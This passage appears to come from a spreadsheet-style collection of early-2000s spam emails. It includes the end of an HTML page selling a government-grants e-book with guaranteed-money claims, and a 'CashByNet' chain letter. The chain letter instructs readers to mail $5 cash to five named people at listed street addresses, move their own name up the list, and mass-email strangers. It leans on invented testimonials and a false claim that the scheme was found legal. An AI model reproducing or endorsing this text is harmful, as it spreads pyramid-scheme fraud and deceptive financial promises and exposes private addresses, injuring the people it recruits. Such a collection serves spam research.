 being Hispanic, you qualify for many programs. Being a Christian will get
 you into 20 programs, there are also many other programs available for
 different faiths, Jewish, Catholic. Not having any money, will get you
 into over 30 programs, 550 programs if you are unemployed, or underemployed.
 The list and sources are endless.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You Are Eligible! This money
 is Absolutely Free and will be yours to use for any worthwhile purpose.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Did you know you can apply
 for as many grants as you want?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;It's true, For instance,
 you could get a $65,000 grant to begin a weight loss business, get $8,800
 in tuition to become a nurse or $35,000 to open up the day-care center,
 you've always dreamed of owning. And then, go out and apply for a grant
 to buy a home for you and your family. And once your new business starts
 doing well you could go out and get another grant for expansion of your
 business. The possibilities are endless.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=0 CELLPADDING=2 WIDTH="555" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;h3&gt;
 &lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;You Must Qualify
 For &lt;u&gt;At Least&lt;/u&gt; $25,000 In Free&lt;br&gt;
 Grants Money, Or Your Money Back!&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/h3&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;We are so confident in our
 Grants Guide that If you have not received at least $25,000 in free grant
 money, or, if you are unhappy with our e-book for any reason within the
 next 12 months, Just send the e-book back and we will refund your entire
 payment. NO QUESTIONS ASKED!!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;If you want to order, we
 insist you do so entirely at our risk. That is why the E-book comes with
 a... &lt;b&gt;No Risk full year Money-Back Guarantee&lt;/b&gt;. There is absolutely
 NO RISK on your part with this 365 day guarantee. What we mean is we want
 you to order without feeling you might "get taken."&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Therefore, we want you to
 order this material today... read it, use it... and if for any reason you
 aren't completely satisfied, you not only can cancel, &lt;b&gt;you should&lt;/b&gt;,
 for an immediate refund of your purchase price. You simply can't lose.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote STYLE="text-align: center"&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#0000CC"&gt;&lt;font size=+1&gt;Free
 Bonuses&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Just to "sweeten" the deal,
 I'll include the following &lt;b&gt;four valuable bonuses&lt;/b&gt;, that you can keep
 as a gift, even if you later decide not to keep the Grants Guide!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #1:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A Fully Featured Grants
 Writing Tutorial Software Package&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;THIS INFO ALONE IS WORTH
 THOUSANDS OF DOLLARS - I GUARANTEE YOU CAN PURCHASE A GRANTS CD OR INFO
 ANYWHERE, AND YOU WILL NOT RECEIVE THIS DOWNLOADABLE SOFTWARE THAT ACTUALLY
 SHOWS YOU HOW TO APPLY AND WHAT TO SAY, SO THAT YOU ARE ACCEPTED FOR A
 GRANT !!!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This interactive software
 tool will walk you through the grant-writing process and will teach you
 everything you need to know to write competitive grants proposals.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The program includes:&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;ul&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;detailed information and
 tips on writing grants proposals;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;how to complete a grant
 application package;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;examples of good, complete
 grant packages;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;a glossary of grants terms;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;resources and contacts;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;a mock grants-writing activity
 where you will be able to compare your results to a successful grant application&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;plus much much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;/ul&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #2:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Insider Information
 Report: 61 Ways To Save Money&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This valuable special report
 contains insider experts tips and techniques that will help you to save
 thousands of Dollars. You'll discover little known secrets and tricks to
 saving money on airline fares, car rental, new and used car buying, auto
 leasing, gasoline, car repairs, auto insurance, life insurance, savings
 and investment, credit cards, home equity loans, home purchase, major appliances,
 home heating, telephone services, food purchase, prescription drugs and
 more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #3:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Complete Guide To
 Starting Your Own Business&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;A
 comprehensive manual that will give you all the guidelines and tools you
 need to start and succeed in a business of your own, packed with guides,
 forms, worksheets and checklists. You will be amazed at how simple these
 strategies and concepts are and how easy it will be for you to apply them
 to your own business idea. Hundreds were sold separately at $40 each...
 you get it here for free.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Here's
 just a taste of what's in the guide:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;How
 to determine the feasibility of your business idea. A complete fill in
 the blanks template system that will help you predict problems before they
 happen and keep you from losing your shirt on dog business ideas.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A step by step explanation
 of how to develop a business plan that will make bankers, prospective partners
 and investors line up at your door. Plus, a complete ready made business
 plan template you can easily adapt to your exact needs.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Discover the easiest, simplest
 ways to find new products for your business that people are anxious to
 buy.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;How
 to make money with your new idea or invention. Secrets of making sure you
 put cash in your pocket on your very first idea business venture.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Complete, step by step instructions
 on how to plan and start a new business. This is must-know must-do information;
 ignore it and you stand a good chance to fail. You get specifically designed
 instructions for each of the following: a service business, a retail store,
 a home based business, a manufacturing company, and more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;What nobody ever told you
 about raising venture capital money. Insider secrets of attracting investors,
 how to best construct your proposal, common mistakes and traps to avoid,
 and much more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Checklist
 for entering into a partnership. Keeps you from costly mistakes when forming
 a partnership.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to select a franchise
 business. A step by step guide to selecting a franchise that is best for
 you.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A complete step-by-step
 organized program for cutting costs in your business. Clients of mine have
 achieved an average of 28% to 35% cost reduction with this technique, and
 you can too. Keep the money in your pocket with this one!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;What are the secrets behind
 constructing a results driven marketing plan? I will lead you step by step
 into developing a marketing plan that will drive your sales through the
 roof.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A complete step by step
 guide guaranteed to help you increase your profits by up to 64%, I call
 it "The Profit Planning Guide". This is a simple, practical, common sense
 strategy, but amazingly enough, almost no one understands or uses it.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #4:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Guide To Home Business
 Success&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;This
 is a&amp;nbsp;&lt;span STYLE="text-decoration: none"&gt;fast, no-frills&lt;/span&gt; guide
 to starting and succeeding in a home based business. Here's just a taste
 of what's in the guide:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Home
 business: is it for you?&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;What
 are the secrets behind the people who have million dollar home based businesses?
 you'll find a 24 tip list proven to turn your home business into a money
 machine.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Laws and regulations you
 must be aware of to avoid legal errors.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Planning
 a home based business&lt;b&gt; -&lt;/b&gt; Insider secrets and tips revealed for ensuring
 your success in a home business.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Fundamentals
 of home business financial planning.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;S&lt;font color="#000000"&gt;imple,
 easy to copy ideas that will enhance your image - and the response you
 get from your customers.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Common
 problems in starting and managing a home based&amp;nbsp; business - and how
 to solve them once and for all.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;Who I Am and Why I'm Qualified
 to Give&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;You The Best Grants Advice
 Available&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;I'm
 the president of a leading Internet based information business. I'm also
 the creator of "The Managing a Small Business CD-ROM" and the author of
 five books.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;I've
 been involved in obtaining grants and in small business for the past 23
 years of my life, as a business coach, a manager of a consulting firm,
 a seminar leader and as the owner of five successful businesses.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;During
 my career as a business coach and consultant I've helped dozens of business
 owners obtain government grants, start their businesses, market, expand,
 get out of troubles, sell their businesses and do practically every other
 small business activity you can think of.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;The
 Guide presented here contains every tip, trick, technique and strategy
 I've learned during my 23 year career. You practically get my whole brain
 in a form of an E-book.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;How the Grants Guide is priced?&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;The Complete Guide To
 Government Grants&lt;/b&gt; is normally priced at $50, but...&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;... as part of an Online
 marketing test, if you purchase from this sale you pay only $19.99 (that's
 75% off ...plus, you still get the FREE valuable bonuses.)&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;If
 you are serious about obtaining free grants money, you &lt;u&gt;need&lt;/u&gt; this
 guide. Don't delay a moment longer. Order Now !!!&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;P.S.&lt;/b&gt; The Complete Guide To Government
 Grants will make a huge difference. You risk nothing. The guide is not
 the original price of $50, but only $19.99 (&lt;u&gt;if you purchase through
 this sale &lt;/u&gt;) and comes with a one year money back guarantee. And you
 get four valuable free bonuses which you may keep regardless. Don't delay
 a moment longer, ORDER NOW !!!!&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;p STYLE="margin-bottom: 0cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Shipping
 and Handling is &lt;b&gt;&lt;font color="#CC0000"&gt;FREE&lt;/font&gt;&lt;/b&gt; since we will
 email you all of this info via access to our secure website which contains
 everything described above.&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;
 &lt;hr&gt;
 &lt;center&gt;
 &lt;p&gt;&amp;nbsp;&lt;font color="#FF0000"&gt;&lt;font size=+4&gt;&lt;a href="http://cbphost.net/users/quiksilver/grants.htm"&gt;Order
 Now!!!&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;p&gt;&lt;a NAME="ebayphotohosting"&gt;&lt;/a&gt;&lt;a NAME="ebaylargephotohosting"&gt;&lt;/a&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;/body&gt;
 &lt;/html&gt;
 0783Iixc7-224SSVD1282BjAl2-765knZz61l34
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: HELLO $NAME
</t>
  </si>
  <si>
    <t xml:space="preserve">Return-Path: &lt;CashByNet@webmillion.com&gt;
 Received: from [216.35.187.6] (HELO webmillion.com)
   by mx12.cluster1.charter.net (CommuniGate Pro SMTP 3.5.9)
   with ESMTP id 4992751 for knb4menu@charter.net; Fri, 26 Apr 2002 08:09:39 -0400
 Received: from es-wmstage1 [216.35.187.6] by webmillion.com with ESMTP
   (SMTPD32-6.04) id ADFB9700C8; Fri, 26 Apr 2002 04:55:33 -0700
 Received: from mail pickup service by es-wmstage1 with Microsoft SMTPSVC;
 	 Fri, 26 Apr 2002 02:12:54 -0700
 From: "webMillion" &lt;CashByNet@webmillion.com&gt;
 To: &lt;knb4menu@charter.net&gt;
 Subject: Hello
 Date: Fri, 26 Apr 2002 02:12:54 -0700
 X-Priority: 3
 X-MSMail-Priority: Normal
 Importance: Normal
 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
 Message-ID: &lt;ES-WMSTAGE1Iv6Eybqf000016b6@es-wmstage1&gt;
 X-OriginalArrivalTime: 26 Apr 2002 09:12:54.0431 (UTC) FILETIME=[8C6632F0:01C1ED02]
 Copyright CashByNet 2000 (http://www.cashbynet.net)
 .If you're sick of scams, then read this, and do what it says.
 I WILL MAKE YOU A PROMISE. Read this email to the end, follow the
 instructions, and you won't have to worry about funding your
 retirement, having money to play, or making ends meet... EVER. I
 know what you are thinking. I never responded to one of these
 before either. Then one day I realized that I throw away $25
 going to a movie for 2 hours with my wife, why not try investing
 this same $25 in a system that just might work. I don't know why
 that day I decided to take a chance, but I can't even come close
 to imagining if I hadn't - I guess I'd still be poor.
 Read on.  It's true. Every word of it. It's legal, and it's ethical.
 Not only are you making money from your own business, you're
 helping other people achieve their goals and fulfill their dreams.
 Give it a shot, you'll see there is absolutely no way you won't get
 AT LEAST a modest return on your start up capital.
 Okay - here's the scoop on CashByNet (CBN):
 ==================================================
 Due to the popularity of this particular email business, and the
 business potential of the Internet, a national weekly news program
 recently devoted an entire show to the investigation of this program
 to see if it's legal, and if it really can make people money.
 Their findings proved that there are "absolutely NO LAWS prohibiting
 the participation in the program, and if people can follow a few
 simple instructions they are bound to make amazing returns with only
 $25 in startup costs."
 DUE TO THE RECENT INCREASE OF POPULARITY &amp; RESPECT THIS PROGRAM HAS
 ATTAINED, IT IS CURRENTLY WORKING BETTER THAN EVER.  THE MORE PEOPLE
 WHO PARTICIPATE, THE BETTER OFF YOU BECOME, AND THE MORE INCOME YOU
 WILL MAKE.
 This is what one had to say:
 "I was approached many times before to participate in Cash By Net, but
 each time I passed on it. One day I decided that instead of going out
 that night, I would take the money I would have spent - invest it in
 this business, and see if it was as lucrative as everyone claimed.
 Two weeks went by . . . . nothing.  Three weeks . . . . $50 dollars
 rolled in.  At this point I was just relieved to get my money back.
 Then it happened - One week after this, I opened my mailbox to find
 $580 in $5 bills waiting for me.  Its been about 8 months now, and I
 just bought a new Mercedes . . . black :)  The startup costs are so
 small, and the time involved is less than 5 hours per week.
 Give it a shot - what do you have to lose?"
 Pam Hedland, South Bound Brook, New Jersey.
 ==================================================
 Another said:
 "Programs like this have been around for a long time but I never
 believed in them. But this year I won a $50 bet on the Patriots to
 win the Super Bowl.  I got this email the following morning, and I
 felt like gambling.  I spent $25 ordering the reports, and the other
 $25 paying a parking ticket.  I followed the instructions
 meticulously - I thought I would at least get my original $25 back.
 As soon as I got the email out, not One week went by before I quadrupled
 my $25.  I'd take that over the Patriots any day.  I got excited, and
 that's when it started to explode.  In less than 6 weeks I was already
 up $9500 bucks.  It's been almost 4 months, and the flow hasn't stopped.
 On an average day, I get anwhere from $500 - $1500 in the mail.  I always
 say that everything happens for a reason, and I feel that this was meant
 to be, maybe it is for you too. Just stick to the steps, do everything it
 says - and all of your hopes and dreams will be real - I promise."
 Greg Moran, Boston, MA.
 For more success stories and photos, go to http://www.cashbynet.net
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 FOLLOW THE SIMPLE INSTRUCTION BELOW AND YOUR FINANCIAL DREAMS WILL COME
 TRUE, GUARANTEED.
 BE SURE TO SAVE A COPY OF THIS EMAIL AS A TEXT DOCUMENT FOR REFERENCE!!!!
 INSTRUCTIONS:
 =====Order all 5 reports from your personal CBN money list below =====
 For each report, send $5 CASH, THE NAME &amp; NUMBER OF THE REPORT YOU ARE
 ORDERING and YOUR E-MAIL ADDRESS to the person whose name appears ON
 THAT LIST next to the report. MAKE SURE YOUR RETURN ADDRESS IS ON YOUR
 ENVELOPE TOP LEFT CORNER in case of any mail problems.
 === MAKE SURE YOU ORDER EACH OF THE 5 REPORTS ===
 You will need all 5 reports so that you can save them on your computer
 and redistribute them. YOUR TOTAL START UP INVESTMENT: $5 X 5 = $25.00.
 Within a few days you will receive, via e-mail, each of the 5 reports
 from these 5 different individuals. Save them on your computer so they
 will be accessible for you to send to the 1,000's of people who will
 order them from you. Also make a floppy of these reports and keep it
 on your desk in case something happens to your computer.
 IMPORTANT - DO NOT ALTER THE NAMES OR SEQUENCE OF THE PEOPLE WHO ARE
 LISTED NEXT TO EACH REPORT.  FOLLOW THE INSTRUCTIONS 1-6 VERY CLOSELY
 OR YOU WILL LOSE OUT ON THE MAJORITY OF THE PROFIT WHICH IS DUE TO
 YOU!! Once you understand the way this works, you will also see how
 it does not work if you alter it. Remember, this method has been
 tested, and proved and if you alter it, it will NOT work !!!
 This is a legitimate BUSINESS. You are offering a product for sale and
 getting paid for it. Treat it as such and you will be VERY profitable
 in a short period of time, and have something many people can't - a
 profitable business enterprise (and more money to do WHATEVER YOU COULD
 POSSIBLY WANT).
 For more information go to http://www.cashbynet.net
 ==================================================
 HERE IS YOUR PERSONAL CBN MONEY LIST :
 ==================================================
 REPORT# 1: 'The Insider's Guide To Advertising for Free On The Net
 Order Report #1 from:
 Chris King
 905 HWY 321 NW PMB 131
 Hickory, NC 28601
 _______________________________________________________
 REPORT # 2: The Insider's Guide To Sending Bulk Email On The Net
 Order Report # 2 from:
 Greg Ferris
 264 S. Cienega Blvd. #1066
 Beverly Hills, CA 90211
 USA
 _______________________________________________________
 REPORT # 3: Secret To Multilevel Marketing On The Net
 Order Report # 3 from :
 Tami C. Ickes
 1667 Cumberland Road
 Bedford, PA 15522
 USA
 _______________________________________________________
 REPORT # 4: How To Become A Millionaire Using MLM &amp; The Net
 Order Report # 4 from:
 B. Turner
 60 McKerrell Way SE
 Calgery, Alberta, Canada
 T2Z 1R7
 _______________________________________________________
 REPORT #5: How To Send Out One Million Emails For Free
 Order Report # 5 From:
 J.Thomas
 16 Spaulding Ave.
 Scituate, Ma. 02066
 USA
 _______________________________________________________
 ORDER EACH REPORT BY ITS NUMBER &amp; NAME ONLY. Notes: Always send $5 USD
 cash for each Report. Checks NOT accepted. Make sure the cash is
 concealed by wrapping it in at least 2 sheets of paper. On one of those
 sheets of paper, Write the NUMBER &amp; the NAME of the Report you are
 ordering,
 YOUR E-MAIL ADDRESS, your name AND postal address.
 _______________________________________________________
 PLEASE READ ON . . .
 =======================
 IMPORTANT!! STEPS 1-6
 =======================
 1.. After you have ordered all 5 reports from your CBN money list, take
 this original saved email and REMOVE the name &amp; address of the person in
 REPORT # 5.  This person has made it through the cycle and is no doubt
 counting their fortune.
 2.. Move the name &amp; address in REPORT # 4 down TO REPORT # 5.
 3.. Move the name &amp; address in REPORT # 3 down TO REPORT # 4.
 4.. Move the name &amp; address in REPORT # 2 down TO REPORT # 3.
 5.. Move the name &amp; address in REPORT # 1 down TO REPORT # 2
 6.. Insert YOUR name &amp; address in the REPORT # 1 Position.
 PLEASE MAKE SURE you copy every name &amp; address ACCURATELY!
 This is critical to YOUR success.
 ==================================================
 **** SAVE THE NEW MODIFIED EMAIL, AS THIS WILL BE THE OFFICIAL DOCUMENT
 WHICH YOU WILL SEND TO PROSPECTIVE CUSTOMERS. BE SURE TO HAVE YOUR NAME
 IN THE #1 POSITION AND THAT YOU DO NOT MAKE ANY OTHER CHANGES TO THIS
 DOCUMENT. THIS IS CRITICAL TO THE PERFORMANCE OF YOUR BUSINESS AND
 SUBSEQUENTLY THE SIZE OF YOUR PROFITS.****
 As soon as you receive all 5 reports via email SAVE A COPY OF THEM!
 These are the products that your customers are paying for. Not only do
 these reports hold the secrets and instructions for your new venture,
 you will be redistributing them to customers when you receive payment.
 To assist you with marketing your business on the internet, the 5
 reports will provide you with valuable marketing information on how to
 send bulk e-mails legally, where to find thousands of free classified
 ads and much more.
 There are 2 Primary methods you will use to get this venture going:
 METHOD # 1: BY SENDING BULK E-MAIL LEGALLY
 ==================================================
 Let's say that you decide to start small, just to see how it goes,
 and we will assume You and those involved send out only 5,000 e-mails
 each. Let's also assume that the mailing receive only a 0.2%
 (2/10 of 1%) response (the response could be much better but lets just
 say it is only 0.2%). Also many people will send out hundreds of
 thousands e-mails instead of only 5,000 each). Continuing with this
 example, you send out only 5,000 e-mails.
 With a 0.2% response, that is only 10 orders for report # 1.  Those 10
 people responded by sending out 5,000 e-mail each for a total of 50,000.
 Out of those 50,000 e-mails only 0.2% responded with orders. That's=100
 people responded and ordered Report # 2.
 Those 100 people mail out 5,000 e-mails each for a total of 500,000
 e-mails. The 0.2% response to that is 1000 orders for Report # 3.
 Those 1000 people send 5,000 e-mail each for a total of 5 million e-mail
 sent out. The 0.2% response is 10,000 orders for Report # 4.
 Those 10,000 people send out 5,000 e-mails each for a total of 50,000,000
 (50 million) e-mails. The 0.2% response to that is 100,000 orders for
 Report # 5.
 THAT'S 100,000 ORDERS TIMES $5 EACH = $500,000.00 (half a million
 dollars).
 Your total income in this example is: 1..... $50 + 2..... $500 + 3.....
 $5,000 + 4..... $50,000 + 5.... $500,000 .... Grand Total=$555,550.00
 REMEMBER, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING OUT OF
 5,000 YOU MAILED TO. Dare to think for a moment what would happen if
 everyone or half or even one 4th of those people mailed 100,000 e-mails
 each or more?
 THE NUMBERS DON'T LIE. VISIT CBN AT
 http://www.cashbynet.net/Calculator/ to
 plug in your own numbers and see the results.
 METHOD # 2: BY PLACING FREE ADS ON THE INTERNET
 ==================================================
 Advertising on the net is extremely inexpensive and there are hundreds
 of FREE places to advertise. Placing a lot of free ads on the Internet
 will easily get a larger response than just emails alone. We strongly
 suggest you start with Method # 1 and add METHOD #2 as you begin to
 become more knowledgeable about the business and study the 5 reports.
 Remember to always provide same day service on all orders to ensure
 proper return on the back end - this means quicker profits for you.
 $$$$$$$$$ YOUR SUCCESS GUIDELINES $$$$$$$$$$$
 Follow these guidelines to guarantee your success:
 === If you do not receive at least 10 orders for Report #1 within 2
 weeks, continue sending e-mails until you do.
 === After you have received 10 orders, 2 to 3 weeks after that you
 should receive 100 orders or more for REPORT # 2. If you did not,
 continue advertising or sending e-mails until you do.
 **ONCE YOU HAVE RECEIVED 100 OR MORE ORDERS FOR REPORT # 2, YOU CAN
 RELAX, because the system is already working for you, and the cash
 will continue to roll in ! THIS IS IMPORTANT TO REMEMBER: Every time
 your name is moved down on the list, you are placed in front of a
 different report.
 You can KEEP TRACK of your PROGRESS by watching which report people are
 ordering from you. IF YOU WANT TO GENERATE MORE INCOME SEND ANOTHER
 BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAIN. There is NO LIMIT
 to the income you can generate from this business !!!
 =================================================
 FOLLOWING IS A NOTE FROM THE ORIGINATOR OF CASH BY NET:
 Cash By Net has become a very popular business for many sole
 proprietors.  However, this program will only work if you are willing
 to put in the time and effort to make it work.  This is not a program
 for everybody.  If you are just a passer by, and don't have a personal
